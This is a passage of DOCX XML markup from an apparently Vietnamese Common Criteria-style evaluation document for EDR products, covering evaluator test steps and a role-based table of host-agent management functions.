          <w:p w14:paraId="3DC7DAFD" w14:textId="6C64FAD7" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Đánh giá viên phải xác minh TSS chứa một danh sách các vai trò và những chức năng họ có thể thực hiện. Đánh giá viên phải xác minh danh sách phù hợp với </w:t>
            </w:r>
            <w:r w:rsidR="00EC6AC5" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>khung</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> yêu cầu. </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">Đánh giá viên </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>kiểm tra xem</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> TSS </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>có mô tả về các giao thức mà IPS hỗ trợ có tương thích với các giao thức ở trên hay không</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="577D5623" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A2C0FA1" w14:textId="75E839C6" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00DE3774" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hướng dẫn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47606130" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên phải xem xét hướng dẫn hoạt động để xác minh rằng  EDR có cung cấp các tài liệu để thực hiện các chức năng quản lý.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="7E9AA9BD" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E5E6589" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="066A3D65" w14:textId="5A0D2B52" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Đánh giá viên phải thực hiện các bài kiểm tra dưới đây với từng vai trò, xác minh từng vai trò bị từ chối hoặc có thể hoàn thành hành động dưới đây theo quy định của </w:t>
            </w:r>
            <w:r w:rsidR="00EC6AC5" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>khung</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> SFR:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34C212A6" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 1:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải định cấu hình lượng thời gian để giữ lại dữ liệu EDR được thu thập vào khung thời gian trong đó dữ liệu hiện có sẽ không khả dụng và xác minh rằng dữ liệu không còn có thể truy cập được thông qua giao diện quản trị.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="145244AC" w14:textId="6851087D" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 2:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải hạn chế về mặt vật lý hoặc tác động vật lý tới các liên lạc mạng giữa hệ thống điểm cuối được quản lý và máy chủ EDR và xác minh rằng trạng thái kết nối bị hạn chế hoặc tạm dừng của Tác nhân máy chủ được </w:t>
            </w:r>
            <w:r w:rsidR="00475C38" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>định danh</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> trên giao diện quản trị EDR. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33213036" w14:textId="0E143249" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 3</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Đánh giá viên phải hạn chế về mặt vật lý hoặc tác động hợp lý lên các giao tiếp mạng giữa hệ thống điểm cuối được quản lý và máy chủ EDR và xác minh rằng trạng thái kết nối bị hạn chế hoặc tạm dừng của Tác nhân máy chủ được </w:t>
            </w:r>
            <w:r w:rsidR="00475C38" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>định danh</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> trên giao diện quản trị EDR.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B434429" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 4:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải thử từng hàm với từng vai trò và xác  minh truy cập phù hợp với hiển thị trong yêu cầu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E6EB77E" w14:textId="6DD40CF8" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">9.3.3.2 </w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">FMT_SMF.1/ Host Đặc điểm kỹ thuật của chức năng quản lý (Quản lý EDR của máy chủ trung gian) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48820BC1" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FMT_SMF.1.1/HOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52144D9F" w14:textId="2C7AA8E8" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tinh chỉnh:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC6AC5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">EDR </w:t>
      </w:r>
      <w:r w:rsidR="00EC6AC5" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">phải có khả năng thực hiện các chức năng </w:t>
      </w:r>
      <w:r w:rsidR="00EC6AC5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>kiểm soát hành vi của Tác nhân máy chủ</w:t>
      </w:r>
      <w:r w:rsidR="00EC6AC5" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> sau đây:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5436"/>
        <w:gridCol w:w="1408"/>
        <w:gridCol w:w="1832"/>
        <w:gridCol w:w="1411"/>
      </w:tblGrid>
      <w:tr w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w14:paraId="6120190C" w14:textId="77777777" w:rsidTr="00EC6AC5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5436" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FF2C11F" w14:textId="77777777" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Chức năng quản lý</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1408" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EE7C5D6" w14:textId="77777777" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Quản trị</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1832" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C9D7B16" w14:textId="77777777" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Chuyên gia phân tích SOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1411" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3087B463" w14:textId="77777777" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Người đọc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w14:paraId="6693DE2A" w14:textId="77777777" w:rsidTr="00EC6AC5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5436" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="276DCE75" w14:textId="3088E0D4" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="00EC6AC5" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">Cấu hình khung thời gian để gửi dữ liệu từ Tác nhân máy chủ tới EDR [ </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>chỉ định</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve">danh sách các khung thời gian có thể định cấu hình </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1408" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A9623F7" w14:textId="77777777" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>M</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CEE7CD2" w14:textId="77777777" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1411" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54373FB5" w14:textId="77777777" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w14:paraId="61F24AC2" w14:textId="77777777" w:rsidTr="00EC6AC5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5436" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51BEE22D" w14:textId="35FA8F47" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="00EC6AC5" w:rsidP="00BD2F41">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1005"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>Chỉ định nhãn hoặc thẻ để phân loại hoặc nhóm các hệ thống điểm cuối riêng lẻ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1408" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22F7A7EC" w14:textId="77777777" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>M</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1F1DED5" w14:textId="77777777" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1411" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06FE398B" w14:textId="2A68ADEA" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="00EC6AC5" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46DD6A9B" w14:textId="16C41502" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Chú giải bảng: M = Bắt buộc, O = Tùy chọn, - = </w:t>
      </w:r>
      <w:r w:rsidR="00EC6AC5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Không xác định</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374FA536" w14:textId="7967C6A7" w:rsidR="009D4B2B" w:rsidRPr="00204C5F" w:rsidRDefault="009D4B2B" w:rsidP="00BD2F41">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lưu ý áp dụng:</w:t>
      </w:r>
